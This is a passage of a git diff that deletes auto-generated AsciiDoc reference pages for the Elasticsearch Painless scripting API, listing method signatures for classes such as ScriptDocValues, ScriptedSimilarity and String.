{java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-GeoPoints]] -==== ScriptDocValues.GeoPoints -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* double arcDistance(double, double) -* double arcDistanceWithDefault(double, double, double) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* double geohashDistance(null) -* double geohashDistanceWithDefault(null, double) -* GeoPoint get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* double getLat() -* double[] getLats() -* int getLength() -* double getLon() -* double[] getLons() -* GeoPoint getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* double planeDistance(double, double) -* double planeDistanceWithDefault(double, double, double) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Longs]] -==== ScriptDocValues.Longs -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Long get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* long getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Strings]] -==== ScriptDocValues.Strings -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* null get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* null getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-mapper"] -=== Shared API for package org.elasticsearch.index.mapper -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-IpFieldMapper-IpFieldType-IpScriptDocValues]] -==== IpFieldMapper.IpFieldType.IpScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* null get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* null getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-query"] -=== Shared API for package org.elasticsearch.index.query -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-IntervalFilterScript-Interval]] -==== IntervalFilterScript.Interval -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int getEnd() -* int getGaps() -* int getStart() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-similarity"] -=== Shared API for package org.elasticsearch.index.similarity -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-ScriptedSimilarity-Doc]] -==== ScriptedSimilarity.Doc -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float getFreq() -* int getLength() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptedSimilarity-Field]] -==== ScriptedSimilarity.Field -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long getDocCount() -* long getSumDocFreq() -* long getSumTotalTermFreq() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptedSimilarity-Query]] -==== ScriptedSimilarity.Query -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float getBoost() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptedSimilarity-Term]] -==== ScriptedSimilarity.Term -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long getDocFreq() -* long getTotalTermFreq() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-painless-api"] -=== Shared API for package org.elasticsearch.painless.api -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-Debug]] -==== Debug -* static void explain(Object) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-script"] -=== Shared API for package org.elasticsearch.script -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-JodaCompatibleZonedDateTime]] -==== JodaCompatibleZonedDateTime -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#compareTo(java.time.chrono.ChronoZonedDateTime)[compareTo](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* int getCenturyOfEra() -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getChronology()[getChronology]() -* int getDayOfMonth() -* int getDayOfWeek() -* DayOfWeek getDayOfWeekEnum() -* int getDayOfYear() -* int getEra() -* int getHour() -* int getHourOfDay() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* long getMillis() -* int getMillisOfDay() -* int getMillisOfSecond() -* int getMinute() -* int getMinuteOfDay() -* int getMinuteOfHour() -* Month getMonth() -* int getMonthOfYear() -* int getMonthValue() -* int getNano() -* ZoneOffset {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getOffset()[getOffset]() -* int getSecond() -* int getSecondOfDay() -* int getSecondOfMinute() -* int getWeekOfWeekyear() -* int getWeekyear() -* int getYear() -* int getYearOfCentury() -* int getYearOfEra() -* ZoneId {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isAfter(java.time.chrono.ChronoZonedDateTime)[isAfter](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isBefore(java.time.chrono.ChronoZonedDateTime)[isBefore](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isEqual(java.time.chrono.ChronoZonedDateTime)[isEqual](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ZonedDateTime minus(TemporalAmount) -* ZonedDateTime minus(long, TemporalUnit) -* ZonedDateTime minusDays(long) -* ZonedDateTime minusHours(long) -* ZonedDateTime minusMinutes(long) -* ZonedDateTime minusMonths(long) -* ZonedDateTime minusNanos(long) -* ZonedDateTime minusSeconds(long) -* ZonedDateTime minusWeeks(long) -* ZonedDateTime minusYears(long) -* ZonedDateTime plus(TemporalAmount) -* ZonedDateTime plus(long, TemporalUnit) -* ZonedDateTime plusDays(long) -* ZonedDateTime plusHours(long) -* ZonedDateTime plusMinutes(long) -* ZonedDateTime plusMonths(long) -* ZonedDateTime plusNanos(long) -* ZonedDateTime plusSeconds(long) -* ZonedDateTime plusWeeks(long) -* ZonedDateTime plusYears(long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toEpochSecond()[toEpochSecond]() -* Instant {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toInstant()[toInstant]() -* LocalDate toLocalDate() -* LocalDateTime toLocalDateTime() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalTime()[toLocalTime]() -* OffsetDateTime toOffsetDateTime() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toString()[toString]() -* null toString(null) -* null toString(null, Locale) -* ZonedDateTime truncatedTo(TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ZonedDateTime with(TemporalAdjuster) -* ZonedDateTime with(TemporalField, long) -* ZonedDateTime withDayOfMonth(int) -* ZonedDateTime withDayOfYear(int) -* ZonedDateTime withEarlierOffsetAtOverlap() -* ZonedDateTime withFixedOffsetZone() -* ZonedDateTime withHour(int) -* ZonedDateTime withLaterOffsetAtOverlap() -* ZonedDateTime withMinute(int) -* ZonedDateTime withMonth(int) -* ZonedDateTime withNano(int) -* ZonedDateTime withSecond(int) -* ZonedDateTime withYear(int) -* ZonedDateTime withZoneSameInstant(ZoneId) -* ZonedDateTime withZoneSameLocal(ZoneId) - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-search-lookup"] -=== Shared API for package org.elasticsearch.search.lookup -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-FieldLookup]] -==== FieldLookup -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def getValue() -* List getValues() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean isEmpty() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/index.asciidoc deleted file mode 100644 index 8d9813dd363..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-similarity-weight]] -=== Similarity Weight API - -The following specialized API is available in the Similarity Weight context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/packages.asciidoc deleted file mode 100644 index a0510fb5f78..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-similarity-weight-java-lang"] -=== Similarity Weight API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-similarity-weight-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity/index.asciidoc deleted file mode 100644 index f8d65739b63..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is 